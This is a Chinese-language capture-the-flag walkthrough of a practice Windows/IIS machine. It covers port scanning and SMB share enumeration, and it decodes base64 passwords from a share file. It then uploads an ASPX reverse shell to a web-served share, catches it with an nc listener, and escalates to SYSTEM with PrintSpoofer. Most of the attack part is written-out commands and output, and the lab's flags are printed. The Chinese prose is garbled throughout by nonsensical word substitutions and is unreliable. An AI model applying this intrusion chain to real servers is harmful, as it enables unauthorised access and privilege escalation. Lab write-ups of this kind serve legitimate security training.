服务发现
┌──(rootkali)-[~]└─# nmap -sV -Pn 10.10.150.167 -p- 255 ⨯Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-09 04:20 EDTNmap scan report for 10.10.150.167Host is up (0.32s latency).Not shown: 65527 filtered portsPORT STATE SERVICE VERSION80/tcp open http Microsoft IIS httpd 10.0135/tcp open msrpc Microsoft Windows RPC139/tcp open netbios-ssn Microsoft Windows netbios-ssn445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds3389/tcp open ms-wbt-server Microsoft Terminal Services49663/tcp open http Microsoft IIS httpd 10.049667/tcp open msrpc Microsoft Windows RPC49669/tcp open msrpc Microsoft Windows RPCService Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windowsService detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 448.90 seconds剖析
80和49663都开启了http服务,目录爆破没有发现什么乏味的货色
445貌似存在永恒之蓝破绽,然而没有攻打胜利
samba 枚举,提醒在\10.10.150.167\nt4wrksv 里有一个passwords.txt文件
┌──(rootkali)-[~/tryhackme]└─# nmap --script "safe or smb-enum-*" -p 445 10.10.207.135 > smb.txtsmb-enum-shares: | account_used: guest| \\10.10.150.167\ADMIN$: | Type: STYPE_DISKTREE_HIDDEN| Comment: Remote Admin| Anonymous access: <none>| Current user access: <none>| \\10.10.150.167\C$: | Type: STYPE_DISKTREE_HIDDEN| Comment: Default share| Anonymous access: <none>| Current user access: <none>| \\10.10.150.167\IPC$: | Type: STYPE_IPC_HIDDEN| Comment: Remote IPC| Anonymous access: <none>| Current user access: READ/WRITE| \\10.10.150.167\nt4wrksv: | Type: STYPE_DISKTREE| Comment: | Anonymous access: <none>|_ Current user access: READ/WRITE| smb-ls: Volume \\10.10.150.167\nt4wrksv| SIZE TIME FILENAME| <DIR> 2020-07-25T15:10:05 .| <DIR> 2020-07-25T15:10:05 ..| 98 2020-07-25T15:13:05 passwords.txt|_匿名连贯//10.10.150.167/nt4wrksv ,下载passwords.txt文件
──(rootkali)-[~]└─# smbclient //10.10.150.167/nt4wrksv 1 ⨯Enter WORKGROUP\root's password: Try "help" to get a list of possible commands.smb: \> ls . D 0 Wed Sep 8 06:09:40 2021 .. D 0 Wed Sep 8 06:09:40 2021 passwords.txt A 98 Sat Jul 25 11:15:33 2020 7735807 blocks of size 4096. 5137057 blocks availablesmb: \> get passwords.txtgetting file \passwords.txt of size 98 as passwords.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)smb: \> ^C本地关上passwords.txt文件,是一个加密的用户账号密码
┌──(rootkali)-[~]└─# cat passwords.txt [User Passwords - Encoded]Qm9iIC0gIVBAJCRXMHJEITEyMw==QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk 看开端有两个==号,猜想是base64加密,放到hackbar里解密
加密串:Qm9iIC0gIVBAJCRXMHJEITEyMw== 解密:Bob - !P@$$W0rD!123加密串:QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk 解密:Bill - Juw4nnaM4n420696969!$$$所以这两个是什么服务的账号密码?
因为开了3389端口,认为是近程连贯的账号,尝试连贯,然而都失败了
然而关上http://10.10.150.167:49663/nt...,同样能够拜访到下面的信息,阐明分享的目录在iss能够拜访的目录内,也就是说能够通过上传一个asp文件,拿到反弹的shell
胜利上传一个asp文件,payload见:https://github.com/borjmz/asp...
┌──(rootkali)-[~]└─# smbclient //10.10.150.167/nt4wrksv Enter WORKGROUP\root's password: Try "help" to get a list of possible commands. smb: \> put /root/tryhackme/revreverse_shell.apsx revse_shell.php smb: \> put /root/tryhackme/reverse_shell.apsx ./shell.aspxputting file /root/tryhackme/reverse_shell.apsx as \shell.aspx (11.7 kb/s) (average 11.7 kb/s)smb: \> ls . D 0 Thu Sep 9 04:33:54 2021 .. D 0 Thu Sep 9 04:33:54 2021 passwords.txt A 98 Sat Jul 25 11:15:33 2020 shell.aspx A 15492 Thu Sep 9 04:33:55 2021 7735807 blocks of size 4096. 5134626 blocks availablesmb: \> 拜访http://10.10.150.167:49663/nt...,拿到一个反弹shell
┌──(rootkali)-[~/tryhackme]└─# nc -lnvp 1234 130 ⨯listening on [any] 1234 ...connect to [10.13.21.169] from (UNKNOWN) [10.10.150.167] 49893Spawn Shell...Microsoft Windows [Version 10.0.14393](c) 2016 Microsoft Corporation. All rights reserved.c:\windows\system32\inetsrv>whoamiwhoamiiis apppool\defaultapppoolc:\windows\system32\inetsrv>拿到userflag
c:\Users\Bob\Desktop>type user.txttype user.txtTHM{fdk4ka34vk346ksxfr21tg789ktf45}运行whoami /priv查看以后用户在零碎中的权限
PS C:\inetpub\wwwroot\nt4wrksv> whoami /privwhoami /privPRIVILEGES INFORMATION----------------------Privilege Name Description State ============================= ========================================= ========SeAssignPrimaryTokenPrivilege Replace a process level token DisabledSeIncreaseQuotaPrivilege Adjust memory quotas for a process DisabledSeAuditPrivilege Generate security audits DisabledSeChangeNotifyPrivilege Bypass traverse checking Enabled SeImpersonatePrivilege Impersonate a client after authentication Enabled SeCreateGlobalPrivilege Create global objects Enabled SeIncreaseWorkingSetPrivilege Increase a process working set Disabled以后用户启用了SeImpersonatePrivilege,意味着能够利用令牌模仿来晋升权限
从https://github.com/itm4n/Prin...下载64位的PrintSpoofer64.exe,而后通过smb上传到windows靶机
提权
PS C:\inetpub\wwwroot\nt4wrksv> .\PrintSpoofer64.exe -i -c cmd.\PrintSpoofer64.exe -i -c cmd[+] Found privilege: SeImpersonatePrivilege[+] Named pipe listening...[+] CreateProcessAsUser() OKMicrosoft Windows [Version 10.0.14393](c) 2016 Microsoft Corporation. All rights reserved.C:\Windows\system32>whoamiwhoamint authority\system拿到root flag
PS C:\users\administrator\desktop> type root.txttype root.txtTHM{1fk5kf469devly1gl320zafgl345pv}PS C:\users\administrator\desktop>